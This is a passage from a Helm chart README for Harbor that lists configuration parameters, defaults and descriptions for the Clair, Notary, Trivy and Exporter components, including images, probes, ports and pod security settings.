| `clair.tls.existingSecret` | Name of an existing secret with the certificates for internal TLS access | `""` |
| `clair.replicaCount` | Number of Clair replicas | `1` |
| `clair.podSecurityContext.enabled` | Enabled Clair pods' Security Context | `true` |
| `clair.podSecurityContext.fsGroup` | Set Clair pod's Security Context fsGroup | `1001` |
| `clair.updateStrategy.type` | Clair deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `clair.updateStrategy.rollingUpdate` | Clair deployment rolling update configuration parameters | `{}` |
| `clair.hostAliases` | Clair pods host aliases | `[]` |
| `clair.podLabels` | Add additional labels to the Clair pods (evaluated as a template) | `{}` |
| `clair.podAnnotations` | Annotations to add to the Clair pods (evaluated as a template) | `{}` |
| `clair.podAffinityPreset` | Clair Pod affinity preset. Ignored if `clair.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `clair.podAntiAffinityPreset` | Clair Pod anti-affinity preset. Ignored if `clair.affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `clair.nodeAffinityPreset.type` | Clair Node affinity preset type. Ignored if `clair.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `clair.nodeAffinityPreset.key` | Clair Node label key to match Ignored if `clair.affinity` is set. | `""` |
| `clair.nodeAffinityPreset.values` | Clair Node label values to match. Ignored if `clair.affinity` is set. | `[]` |
| `clair.affinity` | Clair Affinity for pod assignment | `{}` |
| `clair.nodeSelector` | Clair Node labels for pod assignment | `{}` |
| `clair.tolerations` | Clair Tolerations for pod assignment | `[]` |
| `clair.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `clair.priorityClassName` | Priority Class Name | `""` |
| `clair.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `clair.sidecars` | Add additional sidecar containers to the Clair pods | `[]` |
| `clair.initContainers` | Add additional init containers to the Clair pods | `[]` |
| `clair.extraVolumes` | Optionally specify extra list of additional volumes for the Clair pods | `[]` |
| `clair.automountServiceAccountToken` | Automount service account token | `false` |
| `clair.adapter.image.registry` | Harbor Adapter for Clair image registry | `docker.io` |
| `clair.adapter.image.repository` | Harbor Adapter for Clair image repository | `bitnami/harbor-adapter-clair` |
| `clair.adapter.image.tag` | Harbor Adapter for Clair image tag (immutable tags are recommended) | `2.4.2-debian-10-r3` |
| `clair.adapter.image.pullPolicy` | Harbor Adapter for Clair image pull policy | `IfNotPresent` |
| `clair.adapter.image.pullSecrets` | Harbor Adapter for Clair image pull secrets | `[]` |
| `clair.adapter.image.debug` | Enable Harbor Adapter for Clair image debug mode | `false` |
| `clair.adapter.command` | Override default container command (useful when using custom images) | `[]` |
| `clair.adapter.args` | Override default container args (useful when using custom images) | `[]` |
| `clair.adapter.extraEnvVars` | Array with extra environment variables to add Harbor Adapter for Clair containers | `[]` |
| `clair.adapter.extraEnvVarsCM` | ConfigMap containing extra environment variables for Harbor Adapter for Clair containers | `""` |
| `clair.adapter.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Harbor Adapter for Clair containers | `""` |
| `clair.adapter.containerPorts.http` | Harbor Adapter for Clair HTTP container port | `8080` |
| `clair.adapter.containerPorts.https` | Harbor Adapter for Clair HTTPS container port | `8443` |
| `clair.adapter.livenessProbe.enabled` | Enable livenessProbe on Harbor Adapter for Clair containers | `true` |
| `clair.adapter.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `clair.adapter.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `clair.adapter.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `clair.adapter.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `clair.adapter.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `clair.adapter.readinessProbe.enabled` | Enable readinessProbe on Harbor Adapter for Clair containers | `true` |
| `clair.adapter.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `clair.adapter.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `clair.adapter.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `clair.adapter.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `clair.adapter.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `clair.adapter.startupProbe.enabled` | Enable startupProbe on Harbor Adapter for Clair containers | `false` |
| `clair.adapter.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `clair.adapter.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `clair.adapter.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `clair.adapter.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `clair.adapter.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `clair.adapter.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `clair.adapter.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `clair.adapter.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `clair.adapter.resources.limits` | The resources limits for the Harbor Adapter for Clair containers | `{}` |
| `clair.adapter.resources.requests` | The requested resources for the Harbor Adapter for Clair containers | `{}` |
| `clair.adapter.containerSecurityContext.enabled` | Enabled Harbor Adapter for Clair containers' Security Context | `true` |
| `clair.adapter.containerSecurityContext.runAsUser` | Set Harbor Adapter for Clair containers' Security Context runAsUser | `1001` |
| `clair.adapter.containerSecurityContext.runAsNonRoot` | Set Harbor Adapter for Clair containers' Security Context runAsNonRoot | `true` |
| `clair.adapter.lifecycleHooks` | LifecycleHook for the Harbor Adapter for Clair container(s) to automate configuration before or after startup | `{}` |
| `clair.adapter.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Harbor Adapter for Clair pods | `[]` |
| `clair.adapter.service.ports.http` | Harbor Adapter for Clair HTTP service port | `8080` |
| `clair.adapter.service.ports.https` | Harbor Adapter for Clair HTTPS service port | `8443` |
| `clair.server.image.registry` | Harbor Clair image registry | `docker.io` |
| `clair.server.image.repository` | Harbor Clair image repository | `bitnami/harbor-clair` |
| `clair.server.image.tag` | Harbor Clair image tag (immutable tags are recommended) | `2.4.2-debian-10-r2` |
| `clair.server.image.pullPolicy` | Harbor Clair image pull policy | `IfNotPresent` |
| `clair.server.image.pullSecrets` | Harbor Clair image pull secrets | `[]` |
| `clair.server.image.debug` | Enable Harbor Clair image debug mode | `false` |
| `clair.server.command` | Override default container command (useful when using custom images) | `[]` |
| `clair.server.args` | Override default container args (useful when using custom images) | `[]` |
| `clair.server.extraEnvVars` | Array with extra environment variables to add Harbor Clair containers | `[]` |
| `clair.server.extraEnvVarsCM` | ConfigMap containing extra environment variables for Harbor Clair containers | `""` |
| `clair.server.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Harbor Clair containers | `""` |
| `clair.server.containerPorts.api` | Harbor Clair API container port | `6060` |
| `clair.server.containerPorts.health` | Harbor Clair health container port | `6061` |
| `clair.server.livenessProbe.enabled` | Enable livenessProbe on Harbor Clair containers | `true` |
| `clair.server.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `clair.server.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `clair.server.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `clair.server.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `clair.server.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `clair.server.readinessProbe.enabled` | Enable readinessProbe on Harbor Clair containers | `true` |
| `clair.server.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `clair.server.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `clair.server.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `clair.server.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `clair.server.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `clair.server.startupProbe.enabled` | Enable startupProbe on Harbor Clair containers | `false` |
| `clair.server.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `clair.server.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `clair.server.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `clair.server.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `clair.server.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `clair.server.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `clair.server.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `clair.server.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `clair.server.resources.limits` | The resources limits for the Harbor Clair containers | `{}` |
| `clair.server.resources.requests` | The requested resources for the Harbor Clair containers | `{}` |
| `clair.server.containerSecurityContext.enabled` | Enabled Harbor Clair containers' Security Context | `true` |
| `clair.server.containerSecurityContext.runAsUser` | Set Harbor Clair containers' Security Context runAsUser | `1001` |
| `clair.server.containerSecurityContext.runAsNonRoot` | Set Harbor Clair containers' Security Context runAsNonRoot | `true` |
| `clair.server.lifecycleHooks` | LifecycleHook for the Harbor Clair container(s) to automate configuration before or after startup | `{}` |
| `clair.server.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Harbor Clair pods | `[]` |
| `clair.server.service.ports.api` | Harbor Clair API service port | `6060` |
| `clair.server.service.ports.health` | Harbor Clair health service port | `6061` |
### Notary Parameters
| Name | Description | Value |
| ----------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------ |
| `notary.enabled` | Enable Notary | `true` |
| `notary.secretName` | Fill the name of a kubernetes secret if you want to use your own TLS certificate authority, certificate and private key for notary communications. The secret must contain keys named `notary-signer-ca.crt`, `notary-signer.key` and `notary-signer.crt` that contain the CA, certificate and private key. They will be generated if not set. | `""` |
| `notary.server.image.registry` | Harbor Notary Server image registry | `docker.io` |
| `notary.server.image.repository` | Harbor Notary Server image repository | `bitnami/harbor-notary-server` |
| `notary.server.image.tag` | Harbor Notary Server image tag (immutable tags are recommended) | `2.4.2-debian-10-r2` |
| `notary.server.image.pullPolicy` | Harbor Notary Server image pull policy | `IfNotPresent` |
| `notary.server.image.pullSecrets` | Harbor Notary Server image pull secrets | `[]` |
| `notary.server.image.debug` | Enable Harbor Notary Server image debug mode | `false` |
| `notary.server.command` | Override default container command (useful when using custom images) | `[]` |
| `notary.server.args` | Override default container args (useful when using custom images) | `[]` |
| `notary.server.extraEnvVars` | Array with extra environment variables to add Harbor Notary Server pods | `[]` |
| `notary.server.extraEnvVarsCM` | ConfigMap containing extra environment variables for Harbor Notary Server pods | `""` |
| `notary.server.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Harbor Notary Server pods | `""` |
| `notary.server.containerPorts.server` | Harbor Notary Server container port | `4443` |
| `notary.server.replicaCount` | Number of Harbor Notary Server replicas | `1` |
| `notary.server.livenessProbe.enabled` | Enable livenessProbe on Harbor Notary Server containers | `true` |
| `notary.server.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `notary.server.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `notary.server.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `notary.server.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `notary.server.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `notary.server.readinessProbe.enabled` | Enable readinessProbe on Harbor Notary Server containers | `true` |
| `notary.server.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `notary.server.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `notary.server.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `notary.server.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `notary.server.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `notary.server.startupProbe.enabled` | Enable startupProbe on Harbor Notary Server containers | `false` |
| `notary.server.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `notary.server.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `notary.server.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `notary.server.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `notary.server.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `notary.server.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `notary.server.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `notary.server.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `notary.server.resources.limits` | The resources limits for the Harbor Notary Server containers | `{}` |
| `notary.server.resources.requests` | The requested resources for the Harbor Notary Server containers | `{}` |
| `notary.server.podSecurityContext.enabled` | Enabled Harbor Notary Server pods' Security Context | `true` |
| `notary.server.podSecurityContext.fsGroup` | Set Harbor Notary Server pod's Security Context fsGroup | `1001` |
| `notary.server.containerSecurityContext.enabled` | Enabled Harbor Notary Server containers' Security Context | `true` |
| `notary.server.containerSecurityContext.runAsUser` | Set Harbor Notary Server containers' Security Context runAsUser | `1001` |
| `notary.server.containerSecurityContext.runAsNonRoot` | Set Harbor Notary Server containers' Security Context runAsNonRoot | `true` |
| `notary.server.updateStrategy.type` | Harbor Notary Server deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `notary.server.updateStrategy.rollingUpdate` | Harbor Notary Server deployment rolling update configuration parameters | `{}` |
| `notary.server.lifecycleHooks` | LifecycleHook for the Harbor Notary Server container(s) to automate configuration before or after startup | `{}` |
| `notary.server.hostAliases` | Harbor Notary Server pods host aliases | `[]` |
| `notary.server.podLabels` | Add additional labels to the Harbor Notary Server pods (evaluated as a template) | `{}` |
| `notary.server.podAnnotations` | Annotations to add to the Harbor Notary Server pods (evaluated as a template) | `{}` |
| `notary.server.podAffinityPreset` | Harbor Notary Server Pod affinity preset. Ignored if `notary.server.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `notary.server.podAntiAffinityPreset` | Harbor Notary Server Pod anti-affinity preset. Ignored if `notary.server.affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `notary.server.nodeAffinityPreset.type` | Harbor Notary Server Node affinity preset type. Ignored if `notary.server.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `notary.server.nodeAffinityPreset.key` | Harbor Notary Server Node label key to match Ignored if `notary.server.affinity` is set. | `""` |
| `notary.server.nodeAffinityPreset.values` | Harbor Notary Server Node label values to match. Ignored if `notary.server.affinity` is set. | `[]` |
| `notary.server.affinity` | Harbor Notary Server Affinity for pod assignment | `{}` |
| `notary.server.nodeSelector` | Harbor Notary Server Node labels for pod assignment | `{}` |
| `notary.server.tolerations` | Harbor Notary Server Tolerations for pod assignment | `[]` |
| `notary.server.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `notary.server.priorityClassName` | Priority Class Name | `""` |
| `notary.server.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `notary.server.sidecars` | Add additional sidecar containers to the Harbor Notary Server pods | `[]` |
| `notary.server.initContainers` | Add additional init containers to the Harbor Notary Server pods | `[]` |
| `notary.server.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Harbor Notary Server pods | `[]` |
| `notary.server.extraVolumes` | Optionally specify extra list of additional volumes for the Harbor Notary Server pods | `[]` |
| `notary.server.automountServiceAccountToken` | Automount service account token | `false` |
| `notary.signer.image.registry` | Harbor Notary Signer image registry | `docker.io` |
| `notary.signer.image.repository` | Harbor Notary Signer image repository | `bitnami/harbor-notary-signer` |
| `notary.signer.image.tag` | Harbor Notary Signer image tag (immutable tags are recommended) | `2.4.2-debian-10-r2` |
| `notary.signer.image.pullPolicy` | Harbor Notary Signer image pull policy | `IfNotPresent` |
| `notary.signer.image.pullSecrets` | Harbor Notary Signer image pull secrets | `[]` |
| `notary.signer.image.debug` | Enable Harbor Notary Signer image debug mode | `false` |
| `notary.signer.command` | Override default container command (useful when using custom images) | `[]` |
| `notary.signer.args` | Override default container args (useful when using custom images) | `[]` |
| `notary.signer.extraEnvVars` | Array with extra environment variables to add Harbor Notary Signer pods | `[]` |
| `notary.signer.extraEnvVarsCM` | ConfigMap containing extra environment variables for Harbor Notary Signer pods | `""` |
| `notary.signer.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Harbor Notary Signer pods | `""` |
| `notary.signer.containerPorts.signer` | Harbor Notary Signer container port | `7899` |
| `notary.signer.replicaCount` | Number of Harbor Notary Signer replicas | `1` |
| `notary.signer.livenessProbe.enabled` | Enable livenessProbe on Harbor Notary Signer containers | `true` |
| `notary.signer.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `notary.signer.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `notary.signer.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `notary.signer.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `notary.signer.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `notary.signer.readinessProbe.enabled` | Enable readinessProbe on Harbor Notary Signer containers | `true` |
| `notary.signer.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `notary.signer.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `notary.signer.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `notary.signer.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `notary.signer.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `notary.signer.startupProbe.enabled` | Enable startupProbe on Harbor Notary Signer containers | `false` |
| `notary.signer.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `notary.signer.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `notary.signer.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `notary.signer.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `notary.signer.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `notary.signer.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `notary.signer.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `notary.signer.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `notary.signer.resources.limits` | The resources limits for the Harbor Notary Signer containers | `{}` |
| `notary.signer.resources.requests` | The requested resources for the Harbor Notary Signer containers | `{}` |
| `notary.signer.podSecurityContext.enabled` | Enabled Harbor Notary Signer pods' Security Context | `true` |
| `notary.signer.podSecurityContext.fsGroup` | Set Harbor Notary Signer pod's Security Context fsGroup | `1001` |
| `notary.signer.containerSecurityContext.enabled` | Enabled Harbor Notary Signer containers' Security Context | `true` |
| `notary.signer.containerSecurityContext.runAsUser` | Set Harbor Notary Signer containers' Security Context runAsUser | `1001` |
| `notary.signer.containerSecurityContext.runAsNonRoot` | Set Harbor Notary Signer containers' Security Context runAsNonRoot | `true` |
| `notary.signer.updateStrategy.type` | Harbor Notary Signer deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `notary.signer.updateStrategy.rollingUpdate` | Harbor Notary Signer deployment rolling update configuration parameters | `{}` |
| `notary.signer.lifecycleHooks` | LifecycleHook for the Harbor Notary Signer container(s) to automate configuration before or after startup | `{}` |
| `notary.signer.hostAliases` | Harbor Notary Signer pods host aliases | `[]` |
| `notary.signer.podLabels` | Add additional labels to the Harbor Notary Signer pods (evaluated as a template) | `{}` |
| `notary.signer.podAnnotations` | Annotations to add to the Harbor Notary Signer pods (evaluated as a template) | `{}` |
| `notary.signer.podAffinityPreset` | Harbor Notary Signer Pod affinity preset. Ignored if `notary.signer.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `notary.signer.podAntiAffinityPreset` | Harbor Notary Signer Pod anti-affinity preset. Ignored if `notary.signer.affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `notary.signer.nodeAffinityPreset.type` | Harbor Notary Signer Node affinity preset type. Ignored if `notary.signer.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `notary.signer.nodeAffinityPreset.key` | Harbor Notary Signer Node label key to match Ignored if `notary.signer.affinity` is set. | `""` |
| `notary.signer.nodeAffinityPreset.values` | Harbor Notary Signer Node label values to match. Ignored if `notary.signer.affinity` is set. | `[]` |
| `notary.signer.affinity` | Harbor Notary Signer Affinity for pod assignment | `{}` |
| `notary.signer.nodeSelector` | Harbor Notary Signer Node labels for pod assignment | `{}` |
| `notary.signer.tolerations` | Harbor Notary Signer Tolerations for pod assignment | `[]` |
| `notary.signer.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `notary.signer.priorityClassName` | Priority Class Name | `""` |
| `notary.signer.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `notary.signer.sidecars` | Add additional sidecar containers to the Harbor Notary Signer pods | `[]` |
| `notary.signer.initContainers` | Add additional init containers to the Harbor Notary Signer pods | `[]` |
| `notary.signer.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Harbor Notary Signer pods | `[]` |
| `notary.signer.extraVolumes` | Optionally specify extra list of additional volumes for the Harbor Notary Signer pods | `[]` |
| `notary.signer.automountServiceAccountToken` | Automount service account token | `false` |
| `notary.service.ports.server` | Harbor Notary server service port | `4443` |
| `notary.service.ports.signer` | Harbor Notary signer service port | `7899` |
### Harbor Adapter Trivy Parameters
| Name | Description | Value |
| --------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------ | -------------------------------------- |
| `trivy.image.registry` | Harbor Adapter Trivy image registry | `docker.io` |
| `trivy.image.repository` | Harbor Adapter Trivy image repository | `bitnami/harbor-adapter-trivy` |
| `trivy.image.tag` | Harbor Adapter Trivy image tag (immutable tags are recommended) | `2.4.2-debian-10-r1` |
| `trivy.image.pullPolicy` | Harbor Adapter Trivy image pull policy | `IfNotPresent` |
| `trivy.image.pullSecrets` | Harbor Adapter Trivy image pull secrets | `[]` |
| `trivy.image.debug` | Enable Harbor Adapter Trivy image debug mode | `false` |
| `trivy.enabled` | Enable Trivy | `true` |
| `trivy.debugMode` | The flag to enable Trivy debug mode | `false` |
| `trivy.vulnType` | Comma-separated list of vulnerability types. Possible values `os` and `library`. | `os,library` |
| `trivy.severity` | Comma-separated list of severities to be checked | `UNKNOWN,LOW,MEDIUM,HIGH,CRITICAL` |
| `trivy.ignoreUnfixed` | The flag to display only fixed vulnerabilities | `false` |
| `trivy.insecure` | The flag to skip verifying registry certificate | `false` |
| `trivy.gitHubToken` | The GitHub access token to download Trivy DB | `""` |
| `trivy.skipUpdate` | The flag to disable Trivy DB downloads from GitHub | `false` |
| `trivy.cacheDir` | Directory to store the cache | `/bitnami/harbor-adapter-trivy/.cache` |
| `trivy.tls.existingSecret` | Name of an existing secret with the certificates for internal TLS access | `""` |
| `trivy.command` | Override default container command (useful when using custom images) | `[]` |
| `trivy.args` | Override default container args (useful when using custom images) | `[]` |
| `trivy.extraEnvVars` | Array with extra environment variables to add Trivy pods | `[]` |
| `trivy.extraEnvVarsCM` | ConfigMap containing extra environment variables for Trivy pods | `""` |
| `trivy.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Trivy pods | `""` |
| `trivy.containerPorts.http` | Trivy HTTP container port | `8080` |
| `trivy.containerPorts.https` | Trivy HTTPS container port | `8443` |
| `trivy.replicaCount` | Number of Trivy replicas | `1` |
| `trivy.livenessProbe.enabled` | Enable livenessProbe on Trivy containers | `true` |
| `trivy.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `trivy.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `trivy.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `trivy.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `trivy.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `trivy.readinessProbe.enabled` | Enable readinessProbe on Trivy containers | `true` |
| `trivy.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `trivy.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `trivy.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `trivy.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `trivy.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `trivy.startupProbe.enabled` | Enable startupProbe on Trivy containers | `false` |
| `trivy.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `trivy.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `trivy.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `trivy.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `trivy.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `trivy.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `trivy.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `trivy.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `trivy.resources.limits` | The resources limits for the Trivy containers | `{}` |
| `trivy.resources.requests` | The requested resources for the Trivy containers | `{}` |
| `trivy.podSecurityContext.enabled` | Enabled Trivy pods' Security Context | `true` |
| `trivy.podSecurityContext.fsGroup` | Set Trivy pod's Security Context fsGroup | `1001` |
| `trivy.containerSecurityContext.enabled` | Enabled Trivy containers' Security Context | `true` |
| `trivy.containerSecurityContext.runAsUser` | Set Trivy containers' Security Context runAsUser | `1001` |
| `trivy.containerSecurityContext.runAsNonRoot` | Set Trivy containers' Security Context runAsNonRoot | `true` |
| `trivy.updateStrategy.type` | Trivy deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `trivy.updateStrategy.rollingUpdate` | Trivy deployment rolling update configuration parameters | `{}` |
| `trivy.lifecycleHooks` | LifecycleHook for the Trivy container(s) to automate configuration before or after startup | `{}` |
| `trivy.hostAliases` | Trivy pods host aliases | `[]` |
| `trivy.podLabels` | Add additional labels to the Trivy pods (evaluated as a template) | `{}` |
| `trivy.podAnnotations` | Annotations to add to the Trivy pods (evaluated as a template) | `{}` |
| `trivy.podAffinityPreset` | Trivy Pod affinity preset. Ignored if `trivy.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `trivy.podAntiAffinityPreset` | Trivy Pod anti-affinity preset. Ignored if `trivy.affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `trivy.nodeAffinityPreset.type` | Trivy Node affinity preset type. Ignored if `trivy.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `trivy.nodeAffinityPreset.key` | Trivy Node label key to match Ignored if `trivy.affinity` is set. | `""` |
| `trivy.nodeAffinityPreset.values` | Trivy Node label values to match. Ignored if `trivy.affinity` is set. | `[]` |
| `trivy.affinity` | Trivy Affinity for pod assignment | `{}` |
| `trivy.nodeSelector` | Trivy Node labels for pod assignment | `{}` |
| `trivy.tolerations` | Trivy Tolerations for pod assignment | `[]` |
| `trivy.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `trivy.priorityClassName` | Priority Class Name | `""` |
| `trivy.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `trivy.sidecars` | Add additional sidecar containers to the Trivy pods | `[]` |
| `trivy.initContainers` | Add additional init containers to the Trivy pods | `[]` |
| `trivy.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Trivy pods | `[]` |
| `trivy.extraVolumes` | Optionally specify extra list of additional volumes for the Trivy pods | `[]` |
| `trivy.automountServiceAccountToken` | Automount service account token | `false` |
| `trivy.service.ports.http` | Trivy HTTP service port | `8080` |
| `trivy.service.ports.https` | Trivy HTTPS service port | `8443` |
### Harbor Exporter Parameters
| Name | Description | Value |
| ------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------- |
| `exporter.image.registry` | Registry for exporter image | `docker.io` |
| `exporter.image.repository` | Repository for exporter image | `bitnami/harbor-exporter` |
| `exporter.image.tag` | Tag for exporter image | `2.4.2-debian-10-r2` |
| `exporter.image.pullPolicy` | Harbor exporter image pull policy | `IfNotPresent` |
| `exporter.image.pullSecrets` | Specify docker-registry secret names as an array | `[]` |
| `exporter.image.debug` | Specify if debug logs should be enabled | `false` |
| `exporter.command` | Override default container command (useful when using custom images) | `[]` |
| `exporter.args` | Override default container args (useful when using custom images) | `[]` |
| `exporter.extraEnvVars` | Array containing extra env vars | `[]` |
| `exporter.extraEnvVarsCM` | ConfigMap containing extra env vars | `""` |
| `exporter.extraEnvVarsSecret` | Secret containing extra env vars (in case of sensitive data) | `""` |
| `exporter.containerPorts.metrics` | Harbor Exporter HTTP container port | `8001` |
| `exporter.replicaCount` | The replica count | `1` |
| `exporter.livenessProbe.enabled` | Enable livenessProbe | `true` |
| `exporter.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `exporter.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `exporter.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `exporter.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `exporter.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `exporter.readinessProbe.enabled` | Enable readinessProbe | `true` |
